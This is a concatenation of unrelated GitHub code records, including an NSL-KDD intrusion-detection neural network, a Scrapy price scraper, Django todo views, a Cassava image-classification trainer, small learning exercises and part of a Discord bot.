KM_ODO.append(t_odo[0])\n TOT.append(t_tot[0])\n Date_odo.append(t_odo[1])\n Date_tot.append(t_tot[1])\n offset_odo = 0\n offset_tot = 0\n for i in range(0,len(KM_ODO)-1):\n #print(KM_ODO[i])\n if((KM_ODO[i+1] < KM_ODO[i]) and (((KM_ODO[i]-KM_ODO[i+1])/KM_ODO[i]) > 0.1)):\n COMET_FLAG_ODO = 1\n offset_odo = KM_ODO[i]\n index_odo = i\n comet_init_odo = [Date_odo[i],KM_ODO[i],Date_odo[i+1],KM_ODO[i+1]]\n print('Reset comet or anomaly (ODO)')\n break\n for i in range(0,len(TOT)-1):\n #print(KM_ODO[i])\n if((TOT[i+1] < TOT[i]) and (((TOT[i]-TOT[i+1])/TOT[i]) > 0.1)):\n COMET_FLAG_TOT = 1\n offset_tot = TOT[i]\n index_tot = i\n comet_init_tot = [Date_tot[i],TOT[i],Date_tot[i+1],TOT[i+1]]\n print('Reset comet or anomaly (TOT)')\n break\n if(offset_odo > 0):\n for i in range(index_odo+1,len(KM_ODO)):\n KM_ODO[i] = KM_ODO[i] + offset_odo\n #print(KM_ODO[i])\n if(offset_tot > 0):\n for i in range(index_tot+1,len(TOT)):\n TOT[i] = TOT[i] + offset_tot\n #print(TOT[i])\n if(len(KM_ODO) == 0):\n km_final = 0\n else:\n km_final = (KM_ODO[len(KM_ODO)-1]-KM_ODO[0])\n if(len(TOT) == 0):\n tot_final = 0\n else:\n tot_final = (TOT[len(KM_ODO)-1]-TOT[0])\n\n return [COMET_FLAG_ODO,COMET_FLAG_TOT,comet_init_odo,comet_init_tot,km_final,tot_final]\n \n \n\ndef double_check(M_treated_occ):\n for i in range(0,len(M_treated_occ)-1):\n gps_field_curr = M_treated_occ[i].decode_GPS()\n gps_field_next = M_treated_occ[i+1].decode_GPS()\n if((gps_field_curr[GPS_DATE] == gps_field_next[GPS_DATE]) and (gps_field_curr[GPS_TIME] == gps_field_next[GPS_TIME]) \\\n and (M_treated_occ[i].OBU_ID == M_treated_occ[i+1].OBU_ID)):\n M_treated_occ[i+1].double_check = 1\n","repo_name":"Yass2501/BDK_RMR_py","sub_path":"src/Statistics_processing.py","file_name":"Statistics_processing.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3481541349","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/11/10 10:53 上午\n@Auth : Robbie Deng\n@File :MLP.py\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n\n#################\n# data processing\n\ndos_type = ['back', 'land', 'neptune', 'pod', 'smurf', 'teardrop', 'processtable', 'udpstorm', 'mailbomb', 'apache2']\nprobing_type = ['ipsweep', 'mscan', 'nmap', 'portsweep', 'saint', 'satan']\nr2l_type = ['ftp_write', 'guess_passwd', 'imap', 'multihop', 'phf', 'warezmaster', 'warezclient', 'spy', 'sendmail',\n 'xlock', 'snmpguess', 'named', 'xsnoop', 'snmpgetattack', 'worm']\nu2r_type = ['buffer_overflow', 'loadmodule', 'perl', 'rootkit', 'xterm', 'ps', 'httptunnel', 'sqlattack']\ntype2id = {'normal': 0}\n\nfor i in dos_type:\n type2id[i] = 1\nfor i in probing_type:\n type2id[i] = 1\nfor i in r2l_type:\n type2id[i] = 1\nfor i in u2r_type:\n type2id[i] = 1\n\n# protocol -> id\nall_protocol = ['tcp', 'udp', 'icmp']\nprotocol_dict = {}\nfor id, name in enumerate(all_protocol):\n protocol_dict[name] = id\n\n# service -> id total:70\nall_service = ['aol', 'auth', 'bgp', 'courier', 'csnet_ns', 'ctf', 'daytime', 'discard', 'domain', 'domain_u', 'echo',\n 'eco_i', 'ecr_i', 'efs', 'exec', 'finger', 'ftp', 'ftp_data', 'gopher', 'harvest', 'hostnames', 'http',\n 'http_2784', 'http_443', 'http_8001', 'imap4', 'IRC', 'iso_tsap', 'klogin', 'kshell', 'ldap', 'link',\n 'login', 'mtp', 'name', 'netbios_dgm', 'netbios_ns', 'netbios_ssn', 'netstat', 'nnsp', 'nntp', 'ntp_u',\n 'other', 'pm_dump', 'pop_2', 'pop_3', 'printer', 'private', 'red_i', 'remote_job', 
'rje', 'shell',\n 'smtp', 'sql_net', 'ssh', 'sunrpc', 'supdup', 'systat', 'telnet', 'tftp_u', 'tim_i', 'time', 'urh_i',\n 'urp_i', 'uucp', 'uucp_path', 'vmnet', 'whois', 'X11', 'Z39_50']\nservice_dict = {}\nfor id, name in enumerate(all_service):\n service_dict[name] = id\n\n# flag -> id\nall_flag = ['OTH', 'REJ', 'RSTO', 'RSTOS0', 'RSTR', 'S0', 'S1', 'S2', 'S3', 'SF', 'SH']\nflag_dict = {}\nfor id, name in enumerate(all_flag):\n flag_dict[name] = id\n\n####################\n# read training data\nimport csv\n\nall_train_data = []\ntrainX = []\ntrainY = []\nwith open('KDDTrain+.txt', newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n for row in csvreader:\n all_train_data.append(row)\n\nfor row in all_train_data:\n row[1] = protocol_dict[row[1]]\n row[2] = service_dict[row[2]]\n row[3] = flag_dict[row[3]]\n row[-2] = type2id[row[-2]]\n trainX.append(row[:41])\n trainY.append(row[-2])\ntrain_label = []\nfor i in trainY:\n label_list = [0 for num in range(2)]\n label_list[int(i)] = 1\n train_label.append(label_list)\n\nprint(np.array(trainX).shape)\nprint(np.array(trainY).shape)\n\n\n# parameters\ntraining_epoch = 20\nlearning_rate = 0.001\nbatch_size = 32\ntotal_batch = int(len(trainY) / batch_size)\n\n################\n# read test data\nall_test_data = []\ntestX = []\ntestY = []\nwith open('KDDTest+.txt', newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n for row in csvreader:\n all_test_data.append(row)\nfor row in all_test_data:\n row[1] = protocol_dict[row[1]]\n row[2] = service_dict[row[2]]\n row[3] = flag_dict[row[3]]\n row[-2] = type2id[row[-2]]\n testX.append(row[:41])\n testY.append(row[-2])\ntest_label =[]\nfor i in testY:\n label_list = [0 for num in range(2)]\n label_list[int(i)] = 1\n test_label.append(label_list)\n\nprint(np.array(testX).shape)\nprint(np.array(testY).shape)\n\n# placeholder\nx = tf.placeholder(tf.float32, [None, 41])\ny = tf.placeholder(tf.float32, [None, 2])\nkeep_prob = tf.placeholder(tf.float32)\n\n# MLP\nW1 = tf.get_variable('W1', shape=[41, 30], initializer=tf.contrib.layers.xavier_initializer())\nb1 = tf.Variable(tf.random_normal([30]))\nL1 = tf.nn.relu(tf.matmul(x, W1) + b1)\nL1 = tf.nn.dropout(L1, keep_prob=keep_prob)\n\nW2 = tf.get_variable('W2', shape=[30, 30], initializer=tf.contrib.layers.xavier_initializer())\nb2 = tf.Variable(tf.random_normal([30]))\nL2 = tf.nn.relu(tf.matmul(L1, W2) + b2)\nL2 = tf.nn.dropout(L2, keep_prob=keep_prob)\n\nW3 = tf.get_variable('W3', shape=[30, 30], initializer=tf.contrib.layers.xavier_initializer())\nb3 = tf.Variable(tf.random_normal([30]))\nL3 = tf.nn.relu(tf.matmul(L2, W3) + b3)\nL3 = tf.nn.dropout(L3, keep_prob=keep_prob)\n\nW4 = tf.get_variable('W4', shape=[30, 30], initializer=tf.contrib.layers.xavier_initializer())\nb4 = tf.Variable(tf.random_normal([30]))\nL4 = tf.nn.relu(tf.matmul(L3, W4) + b4)\nL4 = tf.nn.dropout(L4, keep_prob=keep_prob)\n\nW5 = tf.get_variable('W5', shape=[30, 2], initializer=tf.contrib.layers.xavier_initializer())\nb5 = tf.Variable(tf.random_normal([2]))\nhypothesis = tf.nn.relu(tf.matmul(L4, W5) + b5)\n\n# define cost/loss & optimizer\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=hypothesis, labels=y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nprint('==Training started!!!==')\nfor epoch in range(training_epoch):\n avg_cost = 0\n\n for i in range(total_batch):\n x_train = trainX[i * batch_size:(i+1) * 
batch_size]\n y_train = train_label[i * batch_size:(i+1) * batch_size]\n c, _ = sess.run([cost, optimizer], feed_dict={x: x_train, y: y_train, keep_prob: 0.7})\n avg_cost += c / total_batch\n\n print('Epoch', '%03d' % (epoch + 1), 'cost=', '%.9f' % avg_cost)\nprint('==Training finished!!!==')\n\ncorrect_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nprint('Accuracy', sess.run(accuracy, feed_dict={x: testX, y: test_label, keep_prob: 1}))","repo_name":"RobbyDeng/NSL-KDD_MLP-AE","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42153325581","text":"from collections import deque\n\n\n# https://leetcode.com/problems/clone-graph\n# Medium\n# T = O(V + E) - For BFS/DFS\n# S = O(N) - For the dict\n\nclass Node:\n def __init__(self, val=0, neighbors=None):\n self.val = val\n self.neighbors = neighbors if neighbors else []\n\n\ndef cloneGraph(node: Node) -> Node:\n if not node:\n return node\n new = Node(node.val)\n visited = {1: new}\n\n q = deque()\n q.append(node)\n\n while q:\n n = q.popleft()\n for x in n.neighbors:\n if x.val not in visited:\n visited[x.val] = Node(x.val)\n q.append(x)\n visited[n.val].neighbors.append(visited[x.val])\n\n return new\n\n\n# Adjacency list is index + 1. So the first element of adjacency_list are neighbors for Node 1\ndef buildNodeGraph(adjacency_list):\n if not adjacency_list:\n return None\n node = Node(1)\n n = {1: node}\n\n for i, (x, y) in enumerate(adjacency_list):\n if x not in n:\n n[x] = Node(x)\n if y not in n:\n n[y] = Node(y)\n\n n[i + 1].neighbors.append(n[x])\n n[i + 1].neighbors.append(n[y])\n return node\n\n\ndef buildAdjacencyList(node: Node):\n if not node:\n return []\n q = deque()\n q.append(node)\n\n n = {1: []} # first node's value is 1\n\n while q:\n popped = q.popleft()\n for x in popped.neighbors:\n if x.val not in n:\n n[x.val] = []\n q.append(x)\n n[popped.val].append(x.val)\n\n adjacency_list = [None] * len(n)\n for i in range(1, len(n) + 1):\n adjacency_list[i - 1] = n[i]\n return adjacency_list\n","repo_name":"IamConstantine/LeetCodeFiddle","sub_path":"python/CloneGraph.py","file_name":"CloneGraph.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24420624907","text":"import pandas as pd\n\n\ntyping_weakness = pd.read_csv(r\"D:\\Programming and Coding\\Pokemon Project\\Pokemon Type Chart.csv\") #.T causing issues below\ntyping_weakness = typing_weakness.set_index(\"Type\")\n\npokemon_data = pd.read_csv(r\"D:\\Programming and Coding\\Pokemon Project\\pokemon_data.csv\")\n\n\"\"\"\nask for pokemon -- go by name (can do pokedex# if remove megas)\ntake that pokemon's typing and cross-reference with weakness chart\nif one typing, straightforward\n2-typing, have to multiply 2 values\noutput damage multipliers i.e. Pokemon weaknesses are: xxxxx\n\n\"\"\"\n\n\n#merge = pd.merge(pokemon_data, typing_weakness, on= 'Type')\n#merge = pd.merge(pokemon_data, typing_weakness, left_on=\"Other Type\", right_on=\"Type\")\n#print(merge)\n\n\npokemon_name = input('\nWhat Pokemon would you like to know the weakness for? 
')\n\n#make sure first letter is capitalized each part of name catch statement!?!?\n\n\npokemon_stats = pokemon_data[(pokemon_data.Name == pokemon_name)] ##.Name pulls the row\nprint(pokemon_stats)\nprint(\"\\n\")\n#print('Weaknesses for ', pokemon_name, ' are:')\n\n\npokemon_type1 = pokemon_stats.at[pokemon_stats.index[0],\"Type\"]\n\npokemon_type2 = pokemon_stats.at[pokemon_stats.index[0],\"Other Type\"]\n\n\n#print(typing_weakness[pokemon_type1]) #..._type1] ['Dark'] to give just a specific value\n#print(typing_weakness[pokemon_type2])\n\nprint(pokemon_name + \"\\'s weakness chart:\\n\") \n\nif pd.isna(pokemon_type2):\n pokemon_weakness = typing_weakness[pokemon_type1]\n print(pokemon_weakness)\nelse:\n #multiply array.at(pokemontype1) by array.at(pokemontype2)\n array1 = typing_weakness[pokemon_type1]\n array2 = typing_weakness[pokemon_type2]\n pokemon_weakness = array1 * array2\n print(pokemon_weakness)\n\n\n","repo_name":"mrezut/PokemonWeaknessCalculator","sub_path":"PokemonWeaknessChart.py","file_name":"PokemonWeaknessChart.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"48637029892","text":"import scrapy\nfrom scrapy.spiders import CrawlSpider, Spider\nimport re\n\nclass ComputersSpider(CrawlSpider):\n name = 'notik'\n allowed_domains = ['notik.ru']\n start_urls = [\n \"https://www.notik.ru/search_catalog/filter/brand.htm\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=2\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=3\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=4\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=5\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=6\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=7\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=8\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=9\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=10\"\n ]\n\n default_headers = {}\n\n def scrap_computers(self, response):\n\n for card in response.xpath(\"//tr[@class='goods-list-table']\"):\n price_selector = card.xpath(\".//td[@class='glt-cell gltc-cart']\")\n price = re.findall(r'\\d+', price_selector.xpath(\".//b\").css(\"::text\").get())\n price = int(\"\".join(price))\n ecname = price_selector.xpath(\".//a\").attrib.get(\"ecname\")\n yield {ecname : {\"price\" : price}}\n\n def parse_start_url(self, response, **kwargs):\n for url in self.start_urls:\n yield response.follow(\n url, callback=self.scrap_computers, headers=self.default_headers\n )\n\n# class NotikSpider(scrapy.Spider):\n# name = 'notik'\n# allowed_domains = ['notik.ru']\n# start_urls = ['http://notik.ru/']\n\n# def parse(self, response):\n# pass\n","repo_name":"Avnekt/innopolis_2","sub_path":"spiders/notik.py","file_name":"notik.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74530530330","text":"import logging\nfrom django.shortcuts import render, redirect\nfrom .models import Todo, Category\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\n\ndef index(request): # the index view\n todo_list = Todo.objects.all() # querying all todos with the object manager\n categories = Category.objects.all() # getting all categories with object manager\n current_todo = Todo.objects.filter(completion='todo')\n
current_in_progress = Todo.objects.filter(completion='inProgress')\n current_completed = Todo.objects.filter(completion='completed')\n cat_todos = {}\n for cat in categories:\n categorized_todo = Todo.objects.filter(category=cat.id)\n cat_todos[cat.name] = categorized_todo\n\n for t in todo_list:\n t.dueness_calculator()\n t.save()\n logger.info(t.dueness)\n\n categorized_todos = cat_todos.items()\n\n if (request.method == \"POST\"): # checking if the request method is a POST\n logger.info(request.POST)\n if (\"todoAdd\" in request.POST): # checking if there is a request to add a todo\n logger.info(\"todo add being called\")\n title = request.POST[\"description\"] # title\n todo_date = str(request.POST[\"date\"]) # date\n category = request.POST[\"category_select\"] # category\n content = title + \" -- \" + todo_date + \" -- \" + category # content\n current_todo = Todo(title=title, content=content, due_date=todo_date, category=Category.objects.get(name=category), completion=\"todo\", dueness=0)\n current_todo.save() # saving the todo\n return redirect(\"/\") # reloading the page\n\n if (\"todoDelete\" in request.POST): # checking if there is a request to delete a todo\n todo_id = request.POST[\"todoDelete\"]\n current_todo = Todo.objects.get(id=int(todo_id)) # getting todo id\n current_todo.delete() # deleting todo\n return redirect(\"/\") # reloading the page\n\n if (\"editTodo\" in request.POST):\n todo_id = request.POST[\"editTodo\"]\n current_todo = Todo.objects.get(id=int(todo_id))\n logger.info(todo_id)\n logger.info(current_todo.title)\n logger.info(current_todo.due_date)\n logger.info(current_todo.category)\n logger.info(current_todo.content)\n current_todo.title = request.POST[\"edit_description\" + todo_id] or current_todo.title\n current_todo.due_date = str(request.POST[\"edit_due_date\" + todo_id]) or str(current_todo.due_date)\n updated_category = request.POST[\"edit_category_select\" + todo_id] or current_todo.category\n current_todo.category = Category.objects.get(name=updated_category)\n current_todo.content = current_todo.title + \" -- \" + current_todo.due_date + \" -- \" + str(current_todo.category)\n logger.info(current_todo)\n current_todo.save()\n return redirect(\"/\")\n\n if (\"categoryAdd\" in request.POST):\n category_name = request.POST[\"category\"] # category\n current_cat = Category(name=category_name)\n current_cat.save()\n return redirect(\"/\") # reloading the page\n \n if (\"categoryDelete\" in request.POST): # checking if there is a request to delete a category\n category_id = request.POST[\"categoryDelete\"]\n current_cat = Category.objects.get(id=int(category_id)) # getting category by id\n current_cat.delete() # deleting category\n return redirect(\"/\") # reloading the page\n\n # TODO: add in backend functionality for switching from todo, inprogress, and complete\n if (\"todo\" in request.POST or \"inProgress\" in request.POST or \"completed\" in request.POST):\n if (\"todo\" in request.POST):\n logger.info(\"todo being called\")\n todo_id = request.POST[\"todo\"]\n logger.info(\"todo is in the name\")\n current_todo = Todo.objects.get(id=int(todo_id)) # use todo ID to get the todo\n current_todo.completion = \"todo\"\n current_todo.save()\n return redirect(\"/\") # reloading the page\n\n if (\"inProgress\" in request.POST):\n logger.info(\"in progress add being called\")\n todo_id = request.POST[\"inProgress\"]\n logger.info(todo_id)\n current_todo = Todo.objects.get(id=int(todo_id)) # use todo ID to get the todo\n current_todo.completion = 
\"inProgress\"\n current_todo.save()\n return redirect(\"/\") # reloading the page\n\n if (\"completed\" in request.POST):\n logger.info(\"completed being called\")\n todo_id = request.POST[\"completed\"]\n logger.info(\"completed is in the name\")\n current_todo = Todo.objects.get(id=int(todo_id)) # use todo ID to get the todo\n current_todo.completion = \"completed\"\n current_todo.save()\n return redirect(\"/\") # reloading the page\n\n return render(request, \"index.html\", {\"todo_list\": todo_list, \"categories\": categories, \"todo\": current_todo, \"in_progress\": current_in_progress, \"completed\": current_completed, \"categorized_todos\": categorized_todos})\n","repo_name":"Christiantav/todo-app","sub_path":"todoapp/todolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30302826568","text":"import time\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport utils\nfrom sklearn import model_selection\nfrom torch.optim import SGD, Adam\nfrom torch.optim.lr_scheduler import (\n CosineAnnealingLR,\n CosineAnnealingWarmRestarts,\n ReduceLROnPlateau,\n)\nfrom torch.utils.data import DataLoader\n\nfrom cassava import config, loss\nfrom cassava.augment import get_transforms\nfrom cassava.dataset import TestDataset, TrainDataset\nfrom cassava.model import CassavaClassifier\nfrom cassava.train import train_fn\nfrom cassava.valid import valid_fn\n\n# # Initializations\nOUTPUT_DIR = \"/\"\ntrain = pd.read_csv(\"data/train.csv\")\n\nLOGGER = utils.init_logger()\nutils.seed_torch(config.SEED)\n\n# Creating CV Strategy\nfolds = train.copy()\nfold_strategy = model_selection.StratifiedKFold(\n n_splits=config.N_FOLD, shuffle=True, random_state=config.SEED\n)\nfor n, (train_index, val_index) in enumerate(fold_strategy.split(folds, folds[config.TARGET_COL])):\n folds.loc[val_index, \"fold\"] = int(n)\nfolds[\"fold\"] = folds[\"fold\"].astype(int)\n\ndevice = torch.device(\"gpu\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef train_loop(folds, fold):\n\n LOGGER.info(f\"========== fold: {fold} training ==========\")\n\n # ====================================================\n # loader\n # ====================================================\n trn_idx = folds[folds[\"fold\"] != fold].index\n val_idx = folds[folds[\"fold\"] == fold].index\n\n train_folds = folds.loc[trn_idx].reset_index(drop=True)\n valid_folds = folds.loc[val_idx].reset_index(drop=True)\n\n train_dataset = TrainDataset(train_folds, transform=get_transforms(data=\"train\"))\n valid_dataset = TrainDataset(valid_folds, transform=get_transforms(data=\"valid\"))\n\n train_loader = DataLoader(\n train_dataset,\n batch_size=config.BATCH_SIZE,\n shuffle=True,\n num_workers=config.NUM_WORKERS,\n pin_memory=True,\n drop_last=True,\n )\n valid_loader = DataLoader(\n valid_dataset,\n batch_size=config.BATCH_SIZE,\n shuffle=False,\n num_workers=config.NUM_WORKERS,\n pin_memory=True,\n drop_last=False,\n )\n\n # ====================================================\n # scheduler\n # ====================================================\n def get_scheduler(optimizer):\n if config.SCHEDULER == \"ReduceLROnPlateau\":\n scheduler = ReduceLROnPlateau(\n optimizer,\n mode=\"min\",\n factor=config.factor,\n patience=config.patience,\n verbose=True,\n eps=config.eps,\n )\n elif config.SCHEDULER == \"CosineAnnealingLR\":\n scheduler = CosineAnnealingLR(\n optimizer, T_max=config.T_max, 
eta_min=config.MIN_LR, last_epoch=-1\n )\n elif config.SCHEDULER == \"CosineAnnealingWarmRestarts\":\n scheduler = CosineAnnealingWarmRestarts(\n optimizer, T_0=config.T_0, T_mult=1, eta_min=config.MIN_LR, last_epoch=-1\n )\n return scheduler\n\n # ====================================================\n # model & optimizer\n # ====================================================\n model = CassavaClassifier(config.MODEL_NAME, pretrained=True)\n model.to(device)\n\n optimizer = Adam(\n model.parameters(), lr=config.LR, weight_decay=config.WEIGHT_DECAY, amsgrad=False\n )\n scheduler = get_scheduler(optimizer)\n\n # ====================================================\n # apex\n # ====================================================\n if config.APEX:\n from apex import amp\n\n model, optimizer = amp.initialize(model, optimizer, opt_level=\"O1\", verbosity=0)\n\n def get_criterion():\n if config.CRITERION == \"CrossEntropyLoss\":\n criterion = nn.CrossEntropyLoss()\n elif config.CRITERION == \"FocalCosineLoss\":\n criterion = loss.FocalCosineLoss()\n elif config.CRITERION == \"BiTemperedLoss\":\n criterion = loss.BiTemperedLogisticLoss(\n t1=config.t1, t2=config.t2, smoothing=config.smoothing\n )\n return criterion\n\n # ====================================================\n # loop\n # ====================================================\n criterion = get_criterion()\n LOGGER.info(f\"Criterion: {criterion}\")\n\n best_score = 0.0\n\n for epoch in range(config.EPOCHS):\n\n start_time = time.time()\n\n # train\n avg_loss = train_fn(train_loader, model, criterion, optimizer, epoch, scheduler, device)\n\n # eval\n avg_val_loss, preds = valid_fn(valid_loader, model, criterion, device)\n valid_labels = valid_folds[config.TARGET_COL].values\n\n if isinstance(scheduler, ReduceLROnPlateau):\n scheduler.step(avg_val_loss)\n elif isinstance(scheduler, CosineAnnealingLR):\n scheduler.step()\n elif isinstance(scheduler, CosineAnnealingWarmRestarts):\n scheduler.step()\n\n # scoring\n score = utils.get_score(valid_labels, preds.argmax(1))\n\n elapsed = time.time() - start_time\n\n LOGGER.info(\n f\"Epoch {epoch+1} - avg_train_loss: {avg_loss:.4f} avg_val_loss: {avg_val_loss:.4f} time: {elapsed:.0f}s\"\n )\n LOGGER.info(f\"Epoch {epoch+1} - Accuracy: {score}\")\n\n if score > best_score:\n best_score = score\n LOGGER.info(f\"Epoch {epoch+1} - Save Best Score: {best_score:.4f} Model\")\n torch.save(\n {\"model\": model.state_dict(), \"preds\": preds},\n OUTPUT_DIR + f\"{config.MODEL_NAME}_fold{fold}_best.pth\",\n )\n\n check_point = torch.load(OUTPUT_DIR + f\"{config.MODEL_NAME}_fold{fold}_best.pth\")\n valid_folds[[str(c) for c in range(5)]] = check_point[\"preds\"]\n valid_folds[\"preds\"] = check_point[\"preds\"].argmax(1)\n\n return valid_folds\n\n\ndef main():\n\n \"\"\"\n Prepare: 1.train 2.test 3.submission 4.folds\n \"\"\"\n\n def get_result(result_df):\n preds = result_df[\"preds\"].values\n labels = result_df[config.TARGET_COL].values\n score = utils.get_score(labels, preds)\n LOGGER.info(f\"Score: {score:<.5f}\")\n\n if config.train:\n # train\n oof_df = pd.DataFrame()\n for fold in range(config.n_fold):\n if fold in config.trn_fold:\n _oof_df = train_loop(folds, fold)\n oof_df = pd.concat([oof_df, _oof_df])\n LOGGER.info(f\"========== fold: {fold} result ==========\")\n get_result(_oof_df)\n # CV result\n LOGGER.info(\"========== CV ==========\")\n get_result(oof_df)\n # save result\n oof_df.to_csv(OUTPUT_DIR + \"oof_df.csv\", index=False)\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"p-s-vishnu/cassava-leaf-disease-classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"23985003713","text":"#암호화와 복호화\n#암호화\nplain_text=input('암호화할 문장을 입력하시오(영어): ')\nq=input('암호화를 진행합니까?(예/아니오): ')\nencryted_text=\"\"\nif q==\"예\":\n for a in plain_text:\n x=ord(a)\n x+=1\n y=chr(x)\n encryted_text+=y\n\nelse:\n print('암호화/복호화 프로그램을 종료합니다')\n\n#암호문 완성\nprint(encryted_text)\nanswer_text=\"\"\nq2=input('이어서 복호화를 진행하시겠습니까?(예/아니오): ')\n\n\n#복호화\nif q2==\"예\":\n for b in encryted_text:\n x1=ord(b)\n x1-=1\n y1=chr(x1)\n answer_text+=y1\n print(answer_text)\n print('암호화/복호화가 완료되었습니다.')\n\nelse:\n print('암호화가 완료되었습니다.')","repo_name":"ysjin0715/python-practice","sub_path":"chapter8/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10127186169","text":"from tkinter import * # gui tkinter 사용\n\nroot = Tk()\nroot.title('gui title') # 제목\nroot.geometry('640x480') # 가로 * 세로\n''' 아무런 변화가 없다 이유는 메뉴만 설정하고 메뉴에 대한 값을 설정하지 않았다\nmenu = Menu(root)\n\nroot.config(menu=menu)\nroot.mainloop()\n'''\ndef create_new_file():\n print('새 파일을 만듭니다.')\n\nmenu = Menu(root)\n\n# File 메뉴\nmenu_file = Menu(menu, tearoff=0)\nmenu_file.add_command(label='New File', command=create_new_file)\nmenu_file.add_command(label='New Window')\nmenu_file.add_separator() # 구분자\nmenu_file.add_command(label='Open File...')\nmenu_file.add_separator() # 구분자\nmenu_file.add_command(label='Save All', state='disable') # 비활성화\nmenu_file.add_separator() # 구분자\nmenu_file.add_command(label='Exit', command=root.quit) # 종료\n\nmenu.add_cascade(label='File', menu=menu_file)\n\n# Edit 메뉴 (빈 값)\nmenu.add_cascade(label='Edit')\n\n# Language 메뉴 (radio 버튼을 통해서 택1)\nmenu_lang = Menu(menu, tearoff=0)\nmenu_lang.add_radiobutton(label='Python')\nmenu_lang.add_radiobutton(label='Java')\nmenu_lang.add_radiobutton(label='C++')\nmenu.add_cascade(label='Language', menu=menu_lang)\n\n# View 메뉴 (checkbutton 버튼을 통해서 여러가지 택)\nmenu_view = Menu(menu, tearoff=0)\nmenu_view.add_checkbutton(label='Show Minimap')\nmenu_view.add_checkbutton(label='Show Breadcrumbs')\nmenu.add_cascade(label='View', menu=menu_view)\n\nroot.config(menu=menu)\nroot.mainloop()","repo_name":"leedokchidok19/study-python","sub_path":"gui/gui_basic/10_menu.py","file_name":"10_menu.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16017202190","text":"from stack_implementation import Stack\r\n\r\ndef dec_to_bin(dec_num):\r\n rs = Stack()\r\n while dec_num>0:\r\n r = dec_num%2\r\n rs.push(r)\r\n dec_num = dec_num//2\r\n \r\n return_str = \"\"\r\n while not rs.isEmpty():\r\n return_str = return_str + str(rs.pop())\r\n \r\n return return_str\r\n\r\ndef dec_to_other_base(dec_num, base):\r\n digits = \"0123456789ABCDEF\"\r\n rs = Stack()\r\n while dec_num>0:\r\n r = dec_num%base\r\n rs.push(r)\r\n dec_num = dec_num//base\r\n \r\n return_str = \"\"\r\n while not rs.isEmpty():\r\n return_str = return_str + digits[rs.pop()]\r\n \r\n return 
return_str\r\n\r\n\r\n\r\n#print(dec_to_bin(233))\r\n\r\n#print(dec_to_other_base(255,16))","repo_name":"krzysieknaw/Algorithms_and_Data_Structures","sub_path":"data_structures/stack_bin_to_dec.py","file_name":"stack_bin_to_dec.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31072925064","text":"import os\nimport discord\nimport json\nfrom discord.ext import commands\nfrom datetime import datetime, timedelta\nimport time\n\nfrom .utils import *\n\n\nclass Data(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n async def update_data(self, guilds, guild: discord.Guild):\n id = str(guild.id)\n\n if not id in guilds:\n # if the guild is not saved create guild object\n guilds[id] = {}\n guilds[id][\"setup_complete\"] = False\n guilds[id][\"notified\"] = False\n guilds[id][\"scre_enable\"] = True\n guilds[id][\"verbose_enable\"] = False\n guilds[id][\"late_enable\"] = False\n guilds[id][\"auto_enable\"] = False\n guilds[id][\"strict_enable\"] = False\n guilds[id][\"chnl_notify\"] = 0\n guilds[id][\"chnl_approve\"] = 0\n guilds[id][\"chnl_approve_voice\"] = 0\n guilds[id][\"role_approve\"] = 0\n guilds[id][\"role_member\"] = 0\n guilds[id][\"role_silence\"] = 0\n guilds[id][\"banned_members\"] = {}\n return\n\n if not \"setup_complete\" in guilds[id]:\n guilds[id][\"setup_complete\"] = False\n if not \"notified\" in guilds[id]:\n guilds[id][\"notified\"] = False\n if not \"scre_enable\" in guilds[id]:\n guilds[id][\"scre_enable\"] = False\n if not \"verbose_enable\" in 